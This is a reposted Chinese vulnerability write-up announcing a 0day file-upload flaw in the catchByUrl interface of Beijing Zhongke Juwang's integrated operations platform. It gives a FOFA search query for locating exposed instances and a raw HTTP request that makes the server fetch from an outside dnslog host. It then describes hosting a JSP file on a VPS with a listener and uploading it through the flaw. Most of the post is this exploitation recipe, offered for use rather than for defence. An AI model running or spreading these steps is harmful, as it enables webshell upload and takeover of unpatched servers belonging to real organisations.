北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

2024年5月7日14:08:30评论29 views字数 455阅读1分31秒阅读模式

资产测绘

fofa: title="一体化运营平台" || body="thirdparty/ueditor/WordPaster"

漏洞复现

GET /*/*/*/*?url=http://fo1p3p.dnslog.cn HTTP/1.1Host: Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Connection: closeCache-Control: max-age=0

北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

dnslog响应

北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

将jsp文件上传vps后开启监听，使用payload上传文件

北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

上传文件位置

北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

原文始发于微信公众号（银遁安全团队）：【0day】北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2024年5月7日14:08:30
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞https://cn-sec.com/archives/2700479.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

北京中科聚网一体化运营平台catchByUrl接口存在文件上传漏洞

Gradio component server 任意文件读取(CVE-2024-1561)

漏洞复现 | 用友政务财务系统FileDownload接口任意文件读取漏洞【附poc】

Atlassian Jira遍历和读取文件系统漏洞（CVE-2023-26255）

某ERP系统RCE漏洞（附EXP）

金盘图书馆微信管理后台信息泄露漏洞

用友畅捷通T+ Upload.aspx 任意文件上传漏洞

漏洞预警 | Apache Superset服务器端请求伪造漏洞

漏洞预警 | Google Android Framework权限提升漏洞

漏洞预警 | Apple ImageIO远程代码执行漏洞

QQ 逻辑漏洞可执行文件漏洞复现

发表评论

在线咨询

微信